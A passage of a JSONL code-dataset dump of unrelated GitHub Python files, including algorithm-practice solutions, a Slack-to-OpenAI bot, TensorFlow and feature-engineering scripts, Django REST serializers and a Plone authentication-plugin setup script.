new_img_box.setLayout(new_img)\n self.grid.addWidget(new_img_box, 1, 1)\n\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n clock = DataVisualisationApp()\n clock.show()\n sys.exit(app.exec_())\n","repo_name":"johnwondoh/Data_Visualisation_UI_with_PySide2","sub_path":"project_main.py","file_name":"project_main.py","file_ext":"py","file_size_in_byte":5591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"31279983390","text":"import sys\nsys.stdin = open(\".\\Algorithm_Study\\BOJ0509\\BOJ1799\",\"r\")\ninput = sys.stdin.readline\n\nN = int(input())\nboard = [list(map(int, input().split())) for _ in range(N)]\n\nlarr = []\nrarr = []\nfor i in range(N) :\n for j in range(N) :\n if board[i][j] == 1 :\n if i+j % 2 :\n larr.append((i,j))\n else :\n rarr.append((i,j))\nmx = 0 \nprint(larr)\nprint(rarr)\n\ndef backtracking(i, check ) :\n global mx \n if i == len(arr) :\n mx = max(mx, check.count(1))\n return\n if check[i] :\n base = check[i]\n backtracking(i+1, check)\n check[i] = base\n else :\n check[i] = 1\n for j in range(len(arr)) :\n if i == j :\n continue\n if abs(arr[i][0]-arr[j][0]) == abs(arr[i][1]-arr[j][1]) :\n check[j] = -1 \n backtracking(i+1, check)\n check[i] = 0\n backtracking(i+1, check)\n\n\ncheck = [0] * len(larr)\narr = larr\nbacktracking(0, check)\nprint(mx)\nans = mx\n\nmx = 0\narr = rarr \ncheck = [0] * len(rarr)\nbacktracking(0, check)\nans += mx\nprint(mx)\nprint(ans)\n\n\n##############\n\nn=int(input())\n\nchess_map=[]\nblack=[]\nwhite=[]\ncolor=[[0]*n for _ in range(n)]\n\nfor i in range(n):\n for j in range(n):\n color[i][j]=(i % 2 == 0 and j % 2 == 0) or (i % 2 != 0 and j % 2 != 0)\n\nfor i in range(n):\n chess_map.append(list(map(int, input().split())))\n for j in range(n):\n # True가 검은색\n if chess_map[i][j]==1 and color[i][j]==1:\n black.append((i,j))\n # False가 흰색\n if chess_map[i][j]==1 and color[i][j]==0:\n white.append((i,j))\n\n# 검은색인 경우\nBcnt=0\n# 흰색인 경우\nWcnt=0\n\nisused01=[0]*(n*2-1)\nisused02=[0]*(n*2-1)\n\ndef fun(bishop,index,count):\n global Bcnt, Wcnt\n if index==len(bishop):\n rx,ry=bishop[index-1]\n # 블랙이면 Bcnt 최대값\n if color[rx][ry]:\n Bcnt=max(Bcnt,count)\n # 흰색이면 Wcnt 최대값\n else:\n Wcnt=max(Wcnt,count)\n return\n\n x,y=bishop[index]\n if isused01[x+y] or isused02[x-y+n-1]:\n fun(bishop,index+1,count)\n else:\n isused01[x+y]=1\n isused02[x-y+n-1]=1\n fun(bishop,index+1,count+1)\n isused01[x+y]=0\n isused02[x-y+n-1]=0\n fun(bishop,index+1,count)\n\nif len(black)>0:\n fun(black,0,0)\nif len(white)>0:\n fun(white,0,0)\nprint(Bcnt+Wcnt)","repo_name":"BenchleyKim/Study","sub_path":"Algorithm_Study/2021MAY/BOJ0509/BOJ1799.py","file_name":"BOJ1799.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18618489562","text":"def intreverse(n):\r\n\tr=0\r\n\twhile(n > 0):\r\n\t lastDig = n %10\r\n\t r = r *10 + lastDig\r\n\t n = n //10\r\n\treturn r \r\ndef matched(str):\r\n count = 0\r\n for i in str:\r\n if i == \"(\":\r\n count += 1\r\n elif i == \")\":\r\n count -= 1\r\n if count < 0:\r\n return False\r\n return count == 0\r\ndef sumprimes(l):\r\n s=0 \r\n m=len(l)\r\n for i in range(0,m):\r\n num=l[i]\r\n if(num>1):\r\n prime=\"true\" \r\n for j in range(2,num):\r\n if num%j==0:\r\n prime=\"false\"\r\n break\r\n if prime==\"true\":\r\n s=s+num \r\n return(s)\r\nimport ast\r\n\r\ndef tolist(inp):\r\n inp = \"[\"+inp+\"]\"\r\n inp = ast.literal_eval(inp)\r\n return (inp[0],inp[1])\r\n\r\ndef parse(inp):\r\n inp = ast.literal_eval(inp)\r\n return (inp)\r\n\r\nfncall = input()\r\nlparen = fncall.find(\"(\")\r\nrparen = fncall.rfind(\")\")\r\nfname = fncall[:lparen]\r\nfarg = fncall[lparen+1:rparen]\r\n\r\nif fname == \"intreverse\":\r\n arg = parse(farg)\r\n print(intreverse(arg))\r\nelif fname == \"matched\":\r\n arg = parse(farg)\r\n print(matched(arg))\r\nelif fname == \"sumprimes\":\r\n arg = parse(farg)\r\n print(sumprimes(arg))\r\nelse:\r\n print(\"Function\", fname, \"unknown\")\r\n\r\n","repo_name":"JAYESH1117/codes","sub_path":"code_python001.py","file_name":"code_python001.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"37140662259","text":"\"\"\"\n고정점 찾기\ninput :\n7\n-15 -4 2 8 9 13 15\n\noutput :\n2\n\"\"\"\n\nimport sys\nsys.stdin = open(\"input.txt\", \"r\")\ninput = sys.stdin.readline\n\nN = int(input())\nnum_list = list(map(int, input().split()))\n\ndef binary_search():\n l = 0\n r = N - 1\n while l <= r:\n mid = (l + r) // 2\n if mid == num_list[mid]:\n print(mid)\n return\n elif mid > num_list[mid]:\n l = mid + 1\n else: # mid < num_list[mid]\n r = mid - 1\n print(-1)\n return\n\nbinary_search()\n","repo_name":"AlphaTechnic/Algorithm_Study","sub_path":"2021_self_algorithm_study_with_python/binary_search_p2.py","file_name":"binary_search_p2.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"43847910787","text":"import os\nimport openai\nfrom slack_bolt import App\nfrom flask import Flask, request\nfrom slack_bolt.adapter.flask import SlackRequestHandler\n\n\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\napp = App(\n token=os.environ.get(\"SLACK_BOT_TOKEN\"),\n signing_secret=os.environ.get(\"SLACK_SIGNING_SECRET\")\n)\n\nflask_app = Flask(__name__)\nhandler = SlackRequestHandler(app)\n\n\ndef generate_prompt(prompt) -> str:\n return prompt\n\n\ndef ask_gpt(prompt) -> str:\n response = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=generate_prompt(prompt),\n temperature=0.6,\n max_tokens=250,\n )\n return response\n\n\n@app.event(\"app_mention\")\ndef handle_gpt_mention(body, say, logger):\n logger.info(body)\n print(body)\n response = ask_gpt(body[\"event\"][\"text\"])\n logger.info(response)\n print(response.choices)\n say(str(response.choices[0].text))\n\n\n@flask_app.route(\"/slack/events\", methods=[\"POST\"])\ndef slack_events():\n return handler.handle(request)\n\n\n@flask_app.route(\"/\")\ndef index():\n return \"Success\"\n\n\nif __name__ == \"__main__\":\n app.start(port=int(os.environ.get(\"PORT\", 3000)))\n","repo_name":"GoatedChopin/gpt-slack-bot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"23427251923","text":"#!/usr/bin/env python\n\n__author__ = \"Mastercard Team\"\n__email__ = \"\"\n__contributors__ = [\"Mastercard Team\", \"Tam Nguyen\"]\n\n\nimport argparse\nimport logging\nimport numpy as np\nimport pandas as pd\nimport time\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.preprocessing import LabelEncoder\nfrom scipy.sparse import csr_matrix\nfrom tqdm import tqdm\n\nlogging.basicConfig(\n format=\"%(asctime)s %(levelname)s %(message)s\", level=logging.DEBUG\n)\n\n\ndef read_csv(df_file, feat, nrows=None):\n with open(df_file, \"r\", encoding=\"utf-8\") as f:\n if nrows is None:\n lines = map(lambda x: x.strip(), f.readlines())\n else:\n lines = [next(f) for x in range(nrows)]\n\n df = pd.DataFrame(lines)\n df.columns = [\"name\"]\n df[feat] = df.name.str.split(\"\\t\", expand=True,)\n df.drop(columns=[\"name\"], inplace=True)\n df[\"timestamp\"] = pd.to_datetime(df[\"timestamp\"])\n return df\n\n\ndef load_data(\n train_file=\"../public_dat/train.data\",\n validation_file=\"../public_dat/validation.data\",\n test_file=\"../public_dat/test.data\",\n feat_name_file=\"../public_dat/feature.name\",\n sol_file=\"../public_dat/df.solution\",\n nrows=None,\n):\n logging.info(\"loading feature names...\")\n feature_names = open(feat_name_file).readlines()[0].split(\"\\t\")\n logging.info(\"loading labels...\")\n labels = list(map(lambda x: float(x), open(sol_file).readlines()))\n logging.info(\"loading training data...\")\n df = read_csv(train_file, feature_names, nrows)\n df.drop(columns=\"tweet_id\", inplace=True)\n if nrows is not None:\n labels = labels[: df.shape[0]]\n\n logging.info(\"loading validation data...\")\n validation = read_csv(validation_file, feature_names, nrows)\n validation.drop(columns=\"tweet_id\", inplace=True)\n\n logging.info(\"loading test data...\")\n feature_names.remove(\"tweet_id\")\n test = read_csv(test_file, feature_names, nrows)\n\n return df, labels, validation, test\n\n\ndef gen_feature(df):\n df[\"hashtags\"] = df[\"hashtags\"].map(lambda x: \"\" if x == \"null;\" else x)\n df[\"hashtags\"] = df[\"hashtags\"].fillna(\"\")\n df[\"Date\"] = df[\"timestamp\"].map(lambda x: x.date())\n grouped_hashtags = (\n df.groupby(\"Date\")[\"hashtags\"].apply(lambda x: \" \".join(x)).reset_index()\n )\n\n vectorizer = CountVectorizer(binary=True)\n hashtag_age = vectorizer.fit_transform(grouped_hashtags[\"hashtags\"]).todense()\n\n hastag_life = csr_matrix(hashtag_age.sum(axis=0))\n for i in range(1, len(hashtag_age)):\n temp_old = hashtag_age[i - 1]\n temp = hashtag_age[i]\n new_temp = np.where(temp_old > 0, temp_old + 1, 0)\n new_temp = np.where((temp_old == 0) & (temp == 1), 1, new_temp)\n hashtag_age[i] = new_temp\n\n weight_hashtag = np.where(hashtag_age > 0, 1 / np.log1p(hashtag_age), 0)\n\n hashtag_age = csr_matrix(hashtag_age)\n weight_hashtag = csr_matrix(weight_hashtag)\n\n Y = vectorizer.transform(df[\"hashtags\"])\n Y_bool = Y.astype(bool)\n df[\"avg_score\"] = 0\n df[\"max_score\"] = 0\n df[\"count_for_score\"] = 0\n df[\"avg_weighted_score\"] = 0\n df[\"max_weighted_score\"] = 0\n df[\"avg_hashtag_age\"] = 0\n df[\"max_hashtag_age\"] = 0\n df[\"min_hashtag_age\"] = 0\n df[\"max_hashtag_life\"] = 0\n df[\"avg_hashtag_life\"] = 0\n\n ht_count = CountVectorizer().fit_transform(grouped_hashtags[\"hashtags\"])\n\n for date in tqdm(df[\"Date\"].unique()):\n row_index = df[\"Date\"] == date\n val_index = grouped_hashtags[\"Date\"] == date\n Z = Y_bool[row_index.values].multiply(ht_count[val_index.values])\n Z_weighted = Z.multiply(weight_hashtag[val_index.values])\n weights = Y_bool[row_index.values].multiply(weight_hashtag[val_index.values])\n Z_hashtag = Y_bool[row_index.values].multiply(hashtag_age[val_index.values])\n Z_hastag_life = Y_bool[row_index.values].multiply(hastag_life)\n sums = Z.sum(axis=1).A1\n sum_weighted = Z_weighted.sum(axis=1).A1\n weight = weights.sum(axis=1).A1\n counts = np.diff(Z.indptr)\n averages = sums / counts\n df[\"avg_score\"].iloc[row_index.values] = averages\n df[\"max_score\"].iloc[row_index.values] = Z.max(axis=1).A.ravel()\n df[\"avg_weighted_score\"].iloc[row_index.values] = sum_weighted / weight\n df[\"max_weighted_score\"].iloc[row_index.values] = Z_weighted.max(\n axis=1\n ).A.ravel()\n df[\"avg_hashtag_age\"].iloc[row_index.values] = Z_hashtag.sum(\n axis=1\n ).A1 / np.diff(Z_hashtag.indptr)\n df[\"max_hashtag_age\"].iloc[row_index.values] = Z_hashtag.max(axis=1).A.ravel()\n df[\"min_hashtag_age\"].iloc[row_index.values] = weights.max(axis=1).A.ravel()\n df[\"max_hashtag_life\"].iloc[row_index.values] = Z_hastag_life.max(\n axis=1\n ).A.ravel()\n df[\"avg_hashtag_life\"].iloc[row_index.values] = Z_hastag_life.sum(\n axis=1\n ).A1 / np.diff(Z_hastag_life.indptr)\n df[\"count_for_score\"].iloc[row_index.values] = counts\n\n df[\"avg_score\"] = np.where(df[\"avg_score\"].isnull(), 0, df[\"avg_score\"])\n df[\"max_score\"] = np.where(df[\"max_score\"].isnull(), 0, df[\"max_score\"])\n df[\"count_for_score\"] = np.where(\n df[\"count_for_score\"].isnull(), 0, df[\"count_for_score\"]\n )\n df[\"avg_weighted_score\"] = np.where(\n df[\"avg_weighted_score\"].isnull(), 0, df[\"avg_weighted_score\"]\n )\n df[\"max_weighted_score\"] = np.where(\n df[\"max_weighted_score\"].isnull(), 0, df[\"max_weighted_score\"]\n )\n df[\"avg_hashtag_age\"] = np.where(\n df[\"avg_hashtag_age\"].isnull(), 0, df[\"avg_hashtag_age\"]\n )\n df[\"max_hashtag_age\"] = np.where(\n df[\"max_hashtag_age\"].isnull(), 0, df[\"max_hashtag_age\"]\n )\n df[\"min_hashtag_age\"] = np.where(\n df[\"min_hashtag_age\"].isnull(), 0, df[\"min_hashtag_age\"]\n )\n df[\"max_hashtag_life\"] = np.where(\n df[\"max_hashtag_life\"].isnull(), 0, df[\"max_hashtag_life\"]\n )\n df[\"avg_hashtag_life\"] = np.where(\n df[\"avg_hashtag_life\"].isnull(), 0, df[\"avg_hashtag_life\"]\n )\n\n return df\n\n\ndef main(\n train_file,\n valid_file,\n test_file,\n feat_name_file,\n sol_file,\n train_feature_file,\n valid_feature_file,\n test_feature_file,\n):\n nrows = None\n train, labels, validation, test = load_data(\n train_file, valid_file, test_file, feat_name_file, sol_file, nrows=nrows,\n )\n TRN_SET = 0\n VAL_SET = 1\n TST_SET = 2\n train[\"split\"] = TRN_SET\n validation[\"split\"] = VAL_SET\n test[\"split\"] = TST_SET\n\n train[\"LABEL\"] = labels\n validation[\"LABEL\"] = np.nan\n test[\"LABEL\"] = np.nan\n\n logging.info(\"engineering features\")\n df = pd.concat((train, validation, test))\n df = gen_feature(df)\n\n features = [\n \"avg_weighted_score\",\n \"max_weighted_score\",\n \"avg_hashtag_age\",\n \"max_hashtag_age\",\n \"min_hashtag_age\",\n \"max_hashtag_life\",\n \"avg_hashtag_life\",\n \"max_score\",\n \"count_for_score\",\n \"avg_score\",\n ]\n\n train = df[df[\"split\"] == TRN_SET]\n validation = df[df[\"split\"] == VAL_SET]\n test = df[df[\"split\"] == TST_SET]\n\n logging.info(\"saving training features\")\n train[features].to_csv(train_feature_file, index=False, compression=\"gzip\")\n logging.info(\"saving validation features\")\n validation[features].to_csv(valid_feature_file, index=False, compression=\"gzip\")\n logging.info(\"saving testing featured\")\n test[features].to_csv(test_feature_file, index=False, compression=\"gzip\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--train-file\", required=True, dest=\"train_file\")\n parser.add_argument(\"--valid-file\", required=True, dest=\"valid_file\")\n parser.add_argument(\"--test-file\", required=True, dest=\"test_file\")\n parser.add_argument(\"--feat-name-file\", required=True, dest=\"feat_name_file\")\n parser.add_argument(\"--sol-file\", required=True, dest=\"sol_file\")\n parser.add_argument(\n \"--train-feature-file\", required=True, dest=\"train_feature_file\"\n )\n parser.add_argument(\n \"--valid-feature-file\", required=True, dest=\"valid_feature_file\"\n )\n parser.add_argument(\"--test-feature-file\", required=True, dest=\"test_feature_file\")\n\n args = parser.parse_args()\n start = time.time()\n main(\n args.train_file,\n args.valid_file,\n args.test_file,\n args.feat_name_file,\n args.sol_file,\n args.train_feature_file,\n args.valid_feature_file,\n args.test_feature_file,\n )\n\n logging.info(\"finished ({:.2f} sec elapsed)\".format(time.time() - start))\n","repo_name":"nthanhtam/cikm-cup-2020","sub_path":"src/9_gen_feature_v3.py","file_name":"9_gen_feature_v3.py","file_ext":"py","file_size_in_byte":8709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"25562705805","text":"import tensorflow as tf\r\ntf.compat.v1.set_random_seed(66)\r\n\r\nx_data = [[73, 80, 75], # (5, 3)\r\n [93, 88, 93],\r\n [89, 91, 90],\r\n [96, 98, 100],\r\n [73, 66, 70]]\r\n\r\ny_data = [[152], [185], [180], [196], [142]] # (5, 1)\r\n\r\nx = tf.compat.v1.placeholder(tf.float32, shape=[None, 3]) # n, 3 <- 3은 w의 행\r\ny = tf.compat.v1.placeholder(tf.float32, shape=[None, 1]) # n, 1 <- 1은 w의 열\r\n\r\nw = tf.Variable(tf.random.normal([3, 1]), name='weight') # 행렬 곱의 shape (n, m) * (m, s) 의 shape = (n, s)\r\nb = tf.Variable(tf.random.normal([1]), name='bias')\r\n\r\n# hypothesis = x * w + b\r\nhypothesis = tf.matmul(x, w) + b\r\n\r\n#3-1. 컴파일\r\nloss = tf.reduce_mean(tf.square(hypothesis-y)) # mse\r\n\r\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=4e-5)\r\n# optimizer = tf.train.AdamOptimizer(learning_rate=4e-5)\r\ntrain = optimizer.minimize(loss)\r\n\r\n#3-2. 훈련\r\nsess = tf.compat.v1.Session()\r\nsess.run(tf.compat.v1.global_variables_initializer())\r\n\r\nfor epochs in range(70001):\r\n _, loss_v, w_v , b_v = sess.run([train, loss, w, b], feed_dict={x:x_data, y:y_data})\r\n # print(epochs, '\\t', loss_v, '\\t' , w_v, '\\t', b_v)\r\n if epochs % 1000 == 0:\r\n # print(step, sess.run(loss), sess.run(W), sess.run(b))\r\n print(epochs, loss_v, w_v[0][0],w_v[1][0],w_v[2][0], b_v)\r\n\r\nfrom sklearn.metrics import r2_score, mean_absolute_error\r\n\r\ny_predict = tf.matmul(x, w_v) + b_v\r\ny_predict_data = sess.run(y_predict, feed_dict={x: x_data})\r\n# print(y_pred)\r\nr2 = r2_score(y_data, y_predict_data)\r\nprint('r2 : ', r2)\r\n\r\nmae = mean_absolute_error(y_data, y_predict_data)\r\nprint(\"mae : \", mae)\r\n \r\nsess.close()\r\n\r\n# Adam\r\n# r2 : 0.9997270494853739\r\n# mae : 0.3134674072265625\r\n\r\n# r2 : 0.9996362453297368\r\n# mae : 0.321002197265625\r\n\r\n# r2 : 0.9995678495205169\r\n# mae : 0.3292327880859375","repo_name":"Myungj/study","sub_path":"tf114/tf12_mv2.py","file_name":"tf12_mv2.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"36221674867","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n# def mergeKLists(self, lists: List[Optional[ListNode]]) -> Optional[ListNode]:\n# node = ListNode()\n# tail = node\n# merged = []\n \n# for i in range(len(lists)):\n# l = lists[i]\n# while l:\n# merged.append(l.val)\n# l = l.next\n# merged.sort()\n \n# for i in merged:\n# tail.next = ListNode(i)\n# tail = tail.next\n \n# return node.next\n def mergeKLists(self, lists: List[Optional[ListNode]]) -> Optional[ListNode]:\n if not lists or len(lists) < 1:\n return None\n \n while len(lists) > 1:\n mergedList = []\n \n for i in range(0, len(lists), 2):\n list1 = lists[i]\n list2 = lists[i + 1] if (i + 1) < len(lists) else None\n mergedList.append(self.mergeList(list1, list2))\n lists = mergedList\n return lists[0]\n \n \n def mergeList(self, l1, l2):\n node = ListNode()\n tail = node\n \n \n while l1 and l2:\n if l1.val < l2.val:\n tail.next = l1\n l1 = l1.next\n else:\n tail.next = l2\n l2 = l2.next\n tail = tail.next\n \n if l1:\n tail.next = l1\n elif l2:\n tail.next = l2\n \n return node.next\n \n \n ","repo_name":"orangdong/LeetCode","sub_path":"0023-merge-k-sorted-lists/0023-merge-k-sorted-lists.py","file_name":"0023-merge-k-sorted-lists.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"10042035352","text":"from rest_framework import validators\nfrom rest_framework.generics import get_object_or_404\nfrom rest_framework.relations import SlugRelatedField\nfrom rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer\nfrom comments.models import Comment\nfrom buildings.models import Building, BuildingImage, Status\nfrom users.models import (Renter, RenterProfile, Landlord, LandlordProfile)\nfrom buildings.models import Building, BuildingImage, Bookings\n\n\n\nclass RenterProfileSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = RenterProfile\n fields = ('__all__')\n\n\nclass LandlordProfileSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = LandlordProfile\n fields = ('__all__')\n\n\nclass CommentSerializer(serializers.ModelSerializer):\n author = serializers.SlugRelatedField(\n read_only=True, slug_field='email'\n )\n\n class Meta:\n model = Comment\n fields = (\n 'author',\n 'text',\n 'pub_date',\n 'score',\n 'building'\n )\n\n\nclass BuildingImageModelSerializer(ModelSerializer):\n class Meta:\n model = BuildingImage\n fields = ('image',)\n\n\nclass StatusSerializer(serializers.ModelSerializer):\n class Meta:\n model = Status\n fields = (\n 'stat',\n 'reject_text',\n 'building',\n )\n\n\nclass BuildingGetSerializer(ModelSerializer):\n building_images = BuildingImageModelSerializer(\n many=True\n )\n rating = serializers.FloatField()\n building_status = StatusSerializer(many=True)\n\n class Meta:\n model = Building\n fields = (\n 'id',\n 'owner',\n 'title',\n 'specialization',\n 'desc',\n 'address',\n 'coordinates',\n 'operating_hours',\n 'site',\n 'area_sum',\n 'area_rent',\n 'features',\n 'additional_information',\n 'building_images',\n 'capacity',\n 'cost',\n 'booking',\n 'rating',\n 'building_status',\n 'entity',\n 'phone',\n 'email',\n 'inn',\n )\n\n\nclass BuildingPostSerializer(ModelSerializer):\n building_images = BuildingImageModelSerializer(\n source='buildingimage_set',\n many=True, read_only=True\n )\n building_status = StatusSerializer(\n read_only=True,\n source='status_set'\n )\n\n \n class Meta:\n model = Building\n fields = (\n 'id',\n 'owner',\n 'title',\n 'specialization',\n 'desc',\n 'address',\n 'coordinates',\n 'operating_hours',\n 'site',\n 'area_sum',\n 'area_rent',\n 'features',\n 'additional_information',\n 'building_images',\n 'capacity',\n 'cost',\n 'booking',\n 'entity',\n 'phone',\n 'email',\n 'inn',\n 'building_status'\n )\n\n def create(self, validated_data):\n images_data = self.context.get('view').request.FILES\n building = Building.objects.create(**validated_data)\n for image_data in images_data.values():\n BuildingImage.objects.create(building=building, image=image_data)\n return building\n \n\nclass BookingsSerializer(serializers.ModelSerializer):\n renter = serializers.PrimaryKeyRelatedField(read_only=True)\n\n class Meta:\n model = Bookings\n fields = (\n 'id',\n 'renter',\n 'building',\n 'check_in',\n 'check_out',\n 'message',\n 'approve',\n 'status'\n )","repo_name":"Trohimets/createdin.moscow","sub_path":"backend/createdin/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29207424463","text":"# 1\ndef number_of_food_groups():\n return 5\n\n\nprint(number_of_food_groups())\n# 5\n\n\n# 2\ndef number_of_military_branches():\n return 5\n\n\nprint(\n number_of_days_in_a_week_silicon_or_triangle_sides() + number_of_military_branches()\n)\n# output: NameError, number_of_days_in_a_week_silicon_or_triangle_sides not defined\n\n\n# 3\ndef number_of_books_on_hold():\n return 5\n return 10\n\n\nprint(number_of_books_on_hold())\n# output: 5, function breaks after first return\n\n\n# 4\ndef number_of_fingers():\n return 5\n print(10)\n\n\nprint(number_of_fingers())\n# output: 5, function breaks after first return, it never reaches the print\n\n\n# 5\ndef number_of_great_lakes():\n print(5)\n\n\nx = number_of_great_lakes()\nprint(x)\n# output: 5 and None, x = none because the function doesn't return anything\n\n\n# 6\ndef add(b, c):\n print(b + c)\n\n\nprint(add(1, 2) + add(2, 3))\n# output: 3 and 5 because it is printing b+c and not returning it's value\n\n\n# 7\ndef concatenate(b, c):\n return str(b) + str(c)\n\n\nprint(concatenate(2, 5))\n# output: 25, it adds the two values as strings, \"2\" + \"5\" = \"25\"\n\n\n# 8\ndef number_of_oceans_or_fingers_or_continents():\n b = 100\n print(b)\n if b < 10:\n return 5\n else:\n return 10\n return 7\n\n\nprint(number_of_oceans_or_fingers_or_continents())\n# output: 100, 10, first prints b then returns 10 since b is greater than 5\n\n\n# 9\ndef number_of_days_in_a_week_silicon_or_triangle_sides(b, c):\n if b < c:\n return 7\n else:\n return 14\n return 3\n\n\nprint(number_of_days_in_a_week_silicon_or_triangle_sides(2, 3))\nprint(number_of_days_in_a_week_silicon_or_triangle_sides(5, 3))\nprint(\n number_of_days_in_a_week_silicon_or_triangle_sides(2, 3)\n + number_of_days_in_a_week_silicon_or_triangle_sides(5, 3)\n)\n# output: 7, 14, 21\n\n\n# 10\ndef addition(b, c):\n return b + c\n return 10\n\n\nprint(addition(3, 5))\n# output: 8\n\n\n# 11\nb = 500\nprint(b)\n\n\ndef foobar():\n b = 300\n print(b)\n\n\nprint(b)\nfoobar()\nprint(b)\n# output: 500, 500, 300, 500\n\n\n# 12\nb = 500\nprint(b)\n\n\ndef foobar():\n b = 300\n print(b)\n return b\n\n\nprint(b)\nfoobar()\nprint(b)\n# output: 500, 500, 300, 500\n\n\n# 13\nb = 500\nprint(b)\n\n\ndef foobar():\n b = 300\n print(b)\n return b\n\n\nprint(b)\nb = foobar()\nprint(b)\n# output: 500, 500, 300, 300\n\n\n# 14\ndef foo():\n print(1)\n bar()\n print(2)\n\n\ndef bar():\n print(3)\n\n\nfoo()\n# output: 1, 3, 2\n\n\n# 15\ndef foo():\n print(1)\n x = bar()\n print(x)\n return 10\n\n\ndef bar():\n print(3)\n return 5\n\n\ny = foo()\nprint(y)\n# output: 1, 3, 5, 10\n","repo_name":"bobbycoleman-dev/Python","sub_path":"fundamentals/fundamentals/P_functions_basic_i/functions_basic_i.py","file_name":"functions_basic_i.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"72933606920","text":"# -*- coding: utf-8 -*-\nfrom pas.plugins.headers.plugins import HeaderPlugin\nfrom pas.plugins.headers.utils import PLUGIN_ID\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFPlone.interfaces import INonInstallable\nfrom zope.interface import implementer\n\nimport logging\n\n\nlogger = logging.getLogger(__name__)\n\n\n@implementer(INonInstallable)\nclass HiddenProfiles(object):\n def getNonInstallableProfiles(self): # pragma: no cover\n \"\"\"Hide uninstall profile from site-creation and quickinstaller.\"\"\"\n return [\n \"pas.plugins.headers:uninstall\",\n ]\n\n\ndef post_install(context):\n \"\"\"Post install script\"\"\"\n # Setup our request header plugin.\n pas = getToolByName(context, \"acl_users\")\n\n # Create plugin if it does not exist.\n if PLUGIN_ID not in pas.objectIds():\n plugin = HeaderPlugin(\n title=\"Request Headers\",\n )\n plugin.id = PLUGIN_ID\n pas._setObject(PLUGIN_ID, plugin)\n logger.info(\"Created %s in acl_users.\", PLUGIN_ID)\n plugin = getattr(pas, PLUGIN_ID)\n if not isinstance(plugin, HeaderPlugin):\n raise ValueError(\n \"Existing PAS plugin {0} is not a HeaderPlugin.\".format(PLUGIN_ID)\n )\n\n # Activate all supported interfaces for this plugin.\n activate = []\n plugins = pas.plugins\n for info in plugins.listPluginTypeInfo():\n interface = info[\"interface\"]\n interface_name = info[\"id\"]\n if plugin.testImplements(interface):\n activate.append(interface_name)\n logger.info(\n \"Activating interface %s for plugin %s\", interface_name, info[\"title\"]\n )\n\n plugin.manage_activateInterfaces(activate)\n logger.info(\"Plugins activated.\")\n\n # Order some plugins to make sure our plugin is at the top.\n # This is not needed for all plugin interfaces.\n for info in plugins.listPluginTypeInfo():\n interface_name = info[\"id\"]\n if interface_name in [\"IChallengePlugin\", \"IPropertiesPlugin\"]:\n iface = plugins._getInterfaceFromName(interface_name)\n for obj in plugins.listPlugins(iface):\n plugins.movePluginsUp(iface, [PLUGIN_ID])\n logger.info(\"Moved %s to top of %s.\", PLUGIN_ID, interface_name)\n\n\ndef uninstall(context):\n \"\"\"Uninstall script\"\"\"\n from pas.plugins.headers.utils import PLUGIN_ID\n\n pas = getToolByName(context, \"acl_users\")\n\n # Remove plugin if it exists.\n if PLUGIN_ID not in pas.objectIds():\n return\n from pas.plugins.headers.plugins import HeaderPlugin\n\n plugin = getattr(pas, PLUGIN_ID)\n if not isinstance(plugin, HeaderPlugin):\n logger.warning(\n \"PAS plugin %s not removed: it is not a HeaderPlugin.\", PLUGIN_ID\n )\n return\n pas._delObject(PLUGIN_ID)\n logger.info(\"Removed HeaderPlugin %s from acl_users.\", PLUGIN_ID)\n\n\ndef activate_plugin_type(context, plugin_type):\n \"\"\"Activate the plugin_type for our plugin.\n\n plugin_type is an interface.\n \"\"\"\n pas = getToolByName(context, \"acl_users\")\n if PLUGIN_ID not in pas.objectIds():\n logger.warning(\"%s is not in acl_users\", PLUGIN_ID)\n return\n plugin = getattr(pas, PLUGIN_ID)\n if not isinstance(plugin, HeaderPlugin):\n logger.warning(\"Existing PAS plugin %s is not a HeaderPlugin.\", PLUGIN_ID)\n return\n\n # Activate the plugin type.\n plugins = pas.plugins\n plugin_type_name = plugin_type.__name__\n ids = plugins.listPluginIds(plugin_type)\n if PLUGIN_ID not in ids:\n plugins.activatePlugin(plugin_type, PLUGIN_ID)\n logger.info(\"%s plugin activated.\", plugin_type_name)\n else:\n logger.info(\"%s plugin was already activated.\", plugin_type_name)\n\n\ndef activate_credentials_reset_plugin(context):\n from Products.PluggableAuthService.interfaces.plugins import ICredentialsResetPlugin\n\n activate_plugin_type(context, 